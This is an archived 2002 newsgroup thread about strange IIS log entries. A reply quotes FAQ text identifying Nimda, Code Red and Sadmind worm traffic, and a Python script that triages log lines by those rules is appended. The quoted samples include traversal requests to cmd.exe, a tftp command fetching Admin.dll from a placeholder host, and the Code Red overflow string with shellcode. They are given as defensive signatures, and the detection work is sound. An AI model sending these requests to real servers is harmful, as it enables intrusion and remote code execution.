Re: Strange Log File Entries
From: George Hester (hesterloli@hotmail.com)
Date: 11/05/02
- Next message: News: "SMTP service in IIS on Win2000"
- Previous message: Alun Jones: "Re: Editing Certificate Service information"
- In reply to: Karl Levinson [x y] mvp: "Re: Strange Log File Entries"
- Next in thread: John Wood: "Re: Strange Log File Entries"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "George Hester" <hesterloli@hotmail.com>
Date: Tue, 5 Nov 2002 17:21:52 -0500
Excellent. Thanks.
--
George Hester
__________________________________

"Karl Levinson [x y] mvp" <levinson_k@excite.com> wrote in message news:uSYo7aHhCHA.2448@tkmsftngp11...
>
> "Jaffa" <jaffa@cakes.com> wrote in message news:OU6Yx9GhCHA.2508@tkmsftngp08...
> > Can anyone explain these entries in my log file? Is it a virus attack? I have no idea where they came from and why they are trying to access cmd.exe. I have Win2k SP3 installed, and all the other critical updates. X.X.X.X is the IP address of my IIS server.
> >
> > 2002-11-04 21:15:28 80.130.13.155 - W3SVC1 X.X.X.X HEAD /winnt/system32/cmd.exe 404 3 144 124 0 - - -
> > 2002-11-04 21:15:28 80.130.13.155 - W3SVC1 X.X.X.X HEAD /winnt/system32/cmd.exe 404 3 144 91 0 - - -
> > 2002-11-04 21:15:32 80.130.13.155 - W3SVC1 X.X.X.X HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe 500 87 0 95 0 - - -
>
> Yes, looks like an old worm. The codes 404 and 500 show that this was probably not successful.
>
> Note that not only do you need the latest updates, but you also need to have your web server configured correctly, per the hardening Windows 2000 and IIS checklists at www.microsoft.com/technet/security, www.nsa.gov, http://rr.sans.org, etc. It also sounds like you have not installed IISLockdown, which includes URLScan, a very helpful tool in blocking this stuff.
>
> Read below for more info on reading your IIS logs:
>
> ================
>
> These are signs of well-known worms [the Code Red and/or Nimda worm] that spread from server to infected server. Probably every web server on the Internet has received and will continue to receive these "attacks," perhaps several times a day, whether or not the servers are vulnerable to the worm, even if firewalls and/or antivirus are being used.
>
> The IP address that is sending the requests to your server is likely another infected web server and not necessarily a hacker.
>
> If you are seeing the log entries in the URLSCAN.LOG file, then URLScan has successfully blocked that worm attack. [However, the existence of URLScan does not necessarily prove that a computer is free of all viruses and worms; for example, a computer that was infected with a worm before URLScan was installed could still be infected.]
>
> The best way to tell whether your server has been infected is to install and use an antivirus program.
>
> It is not necessarily always accurate to deduce from the 200, 404 and 500 / 502 codes in a web server log whether or not the server has been infected. For more information on this, see the section in this FAQ entitled "I found a code 200 [or 502] in my IIS logs, does that mean my web server has been successfully hacked?"
>
> For more information on these worm attacks, visit the web site of your favorite antivirus vendor and/or visit the links below:
>
> www.cert.org
> www.cve.mitre.org/cve
> www.nipc.gov
> www.eeye.com
> www.microsoft.com/technet/security
>
> Below are samples of what an IIS web server log would look like when attacked by a worm such as Nimda, Code Red and/or Sadmind / IIS worms:
>
>
> NIMDA LOOKS LIKE THIS
> =======================
>
> [Note that the system is likely compromised if you see a code 200 in the line where the "tftp.exe" command is used to download the file "Admin.dll," as in the last line below. Note however that the lines below containing the "copy" and "echo" commands were also successful, despite the 502 code which usually indicates failure.]
>
> GET /scripts/root.exe?/c+dir 200 -
> GET /MSADC/root.exe?/c+dir 200 -
> GET /c/winnt/system32/cmd.exe?/c+dir 200 -
> GET /d/winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 200 -
> GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir 200 -
>
> GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
> GET /scripts/root.exe /c+echo+.././index.asp 502 -
>
> GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp%20i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll 200 -
>
>
> CODE RED LOOKS LIKE THIS:
> =======================
>
> [Note that a code 200 after the "GET /default.ida?" line in a Code Red attack does not necessarily indicate success or failure. It means that the .ida mapping has not been removed from the IIS server, and it probably should be.]
>
> GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
> u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
> b%u53ff%u0078%u0000%u00=a
>
>
> CODE RED II LOOKS LIKE THIS:
> ======================
>
> [Note that a code 200 after the "GET /default.ida?" line in a Code Red attack does not necessarily indicate success or failure. It means that the .ida mapping has not been removed from the IIS server, and it probably should be.]
>
> GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
> u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0
> 0%u531b%u53ff%u0078%u0000%u00=a 200 -
>
>
> SADMIND / IIS WORM LOOKS LIKE THIS:
> ===============
>
> [Note that this is what the log looks like on a successfully compromised system; the code 502 after the "copy" and "echo" commands does not indicate failure here, the commands were successful despite the 502.]
>
> GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
> GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
> GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
> GET /scripts/root.exe /c+echo+.././index.asp 502 -
>
> [Thanks to "Gurn" and others]
> ________________________________________________________
>
> (11.19) I found a code 200 [or 502] in my IIS logs, does that mean my web server has been successfully hacked?
>
> A: Not necessarily. Because of this uncertainty, the best way to tell whether your server has been infected is to install and use an antivirus program.
>
> Normally, a code 502 in an IIS web server log indicates that the request was unsuccessful. However, in some cases, the code 502 does not indicate failure [for example the code 502 after the "copy" and "echo" commands used by the Sadmind / IIS Worm and Nimda].
>
> Similarly, a code 200 after a line in an IIS web server log indicates that the request was successful. However, read the post below by Paul Lynch regarding a 200 code after a "GET /default.ida" request [as with the Code Red worm]:
>
> "...a lot of confusion surrounds the 200 return code in response to the GET /default.ida request.
>
> In a nutshell what this means is that if you haven't removed the .ida mapping, IIS processes the request successfully and returns a 200 to the browser.
>
> What it *doesn't* mean is that the worm has successfully penetrated your machine. A patched Index Service will still return a 200 to a browser if the .ida mapping is present."
>
> A code 404 in the logs so far still appears to indicate an unsuccessful request [or attack], due to the attacker or worm requesting a file that does not exist on the server.
>
> Again, because of this uncertainty, the best way to tell whether your server has been infected is to install and use an antivirus program.
>
> [Thanks to Paul Lynch]
>
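The log-reading rules from the quoted FAQ (a 404 means the probe missed; a 200 on default.ida only shows the .ida mapping is still present; a 502 after "copy"/"echo" and a 200 on the tftp Admin.dll line mean the command actually ran) turned into a small triage script over IIS log lines. This is an added example, not part of the original thread; the lines in SAMPLE_LOG are constructed to mimic the thread's entries, and the verdict strings are my own wording.

```python
from urllib.parse import unquote

# Constructed sample lines (not from a real server): two full W3C extended entries
# like the original question, the rest in the FAQ's "METHOD uri status -" form.
SAMPLE_LOG = r"""
2002-11-04 21:15:28 80.130.13.155 - W3SVC1 X.X.X.X HEAD /winnt/system32/cmd.exe 404 3 144 124 0 - - -
2002-11-04 21:15:32 80.130.13.155 - W3SVC1 X.X.X.X HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe 500 87 0 95 0 - - -
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir 200 -
GET /scripts/root.exe /c+echo+.././index.asp 502 -
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp%20i%20x.x.x.x%20GET%20Admin.dll%20d:\Admin.dll 200 -
GET /default.ida?NNNNNNNN%u9090%u6858%ucbd3%u7801=a 200 -
GET /index.asp 200 -
"""
METHODS = {"GET", "HEAD", "POST"}

def parse_line(line):
    """Return (uri_stem, query, status); stem and query are decoded and lower-cased."""
    toks = line.split()
    i = next(k for k, t in enumerate(toks) if t in METHODS)
    stem, rest = toks[i + 1], toks[i + 2:]
    if "?" in stem:                       # query glued to the stem
        stem, query = stem.split("?", 1)
    elif rest and not rest[0].isdigit():  # W3C logs cs-uri-query as its own field
        query, rest = rest[0], rest[1:]
    else:
        query = ""
    return unquote(stem).lower(), unquote(query).lower(), int(rest[0])

def classify(line):
    """Apply the thread's reading rules to one log line and return a verdict."""
    stem, query, status = parse_line(line)
    if stem.endswith("/default.ida"):     # Code Red / Code Red II probe
        return ("ida mapping present, not proof of compromise"
                if status == 200 else "default.ida probe, status %d" % status)
    if not (stem.endswith("cmd.exe") or stem.endswith("root.exe")):
        return "no worm signature"
    if status == 404:
        return "worm probe, file not found"
    if status == 200 and "tftp" in query and "admin.dll" in query:
        return "nimda tftp download returned 200, likely compromised"
    if status == 502 and ("copy" in query or "echo" in query):
        return "copy/echo returned 502, treat as successful"
    if status == 200:
        return "cmd.exe/root.exe reachable, command executed"
    return "worm probe, status %d" % status

if __name__ == "__main__":                # triage the constructed sample
    for raw in SAMPLE_LOG.strip().splitlines():
        print(f"{classify(raw):55s} {raw[:60]}")
```

Feed it a real W3C extended log (one entry per line) instead of SAMPLE_LOG; entries whose traversal is encoded with raw bytes rather than %-escapes, like the \xc1\x1c lines in the Nimda sample, still match because the check is on the decoded stem ending in cmd.exe or root.exe.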